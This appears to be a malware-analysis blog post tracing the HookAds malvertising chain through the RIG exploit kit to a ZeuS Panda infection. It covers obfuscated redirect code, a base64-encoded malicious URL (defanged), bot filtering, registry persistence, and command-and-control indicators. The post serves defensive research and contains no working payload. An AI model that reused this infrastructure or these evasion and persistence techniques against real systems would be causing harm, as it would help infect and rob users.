HookAds Campaign Leads to RIG EK and Drops ZeuS Panda.

The HookAds campaign is still active and there have been some recent changes. For starters, this campaign usually drops a variant of Ursnif known as Dreambot. However, the sample that I got today seems more likely to be a ZeuS variant. This was later confirmed by my friend @Antelox who identified it as ZeuS Panda.

Let’s first look at the HTTP traffic involved in the infection chain and then we will examine some of the code:

We see my host making connections to the decoy site, which I’ve hidden. Normally, host would be redirected to one of these decoy sites via malvertising.

The decoy site still contains a script to grab the file popunder.php:

Popunder.php contains the following packed and obfuscated code:

Running the code shows variable p returning the following code:

At the bottom of the code you can see var scr = containing a base64 encoded string:

aHR0cDovL3JvY2tzaWRlbnQuaW5mby9iYW5uZXJzL2FkdmVydGlzaW5n

Decoding the string returns the following URL:

hxxp://rocksident.info/banners/advertising

We can also see that an iframe is inserted in the web page, instructing the browser to load content from the malicious URL.

The URL returns what has been called the pre-landing page which is designed to filter out unwanted traffic. Here is an image of the pre-landing page showing some more packed code:

The browser will execute the embedded script, allowing us to examine the contents of variable p:

Here we can see that if (BrowserInfo.is_bot == true) then the host should expect to see a page showing “404 Not Found,” among other things. This is followed by the else statement, used to specify the next block of code to be executed if the same condition is false (not a “bot”).

An in-depth report from G Data, which can be found HERE, explains how ZeuS Panda finds a directory under %APPDATA%\Roaming\ that is empty, has a path that is at least 140 characters long, doesn’t contain certain strings like “Microsoft”, and is as deep in the directory tree as possible. Their analysis also showed that Panda created four files with random extensions. In my infection these happened to be .hou, .oze, .pow, and .sol.

HKCU\Software\Microsoft\Windows\CurrentVersion\Run is being used for its persistence mechanism:

Additional keys being created in HKCU\Software\Microsoft\:

Not long after the payload was dropped and executed on the host we see post-infection network traffic to 5.8.88.219 via TCP port 443:

Here are some additional DNS queries and responses captured during my second run:

This shows DNS requests for nekfad.xyz, which resolves to 5.8.88.219, as well as a PTR record with the hostname davydovamihalina02.example.com.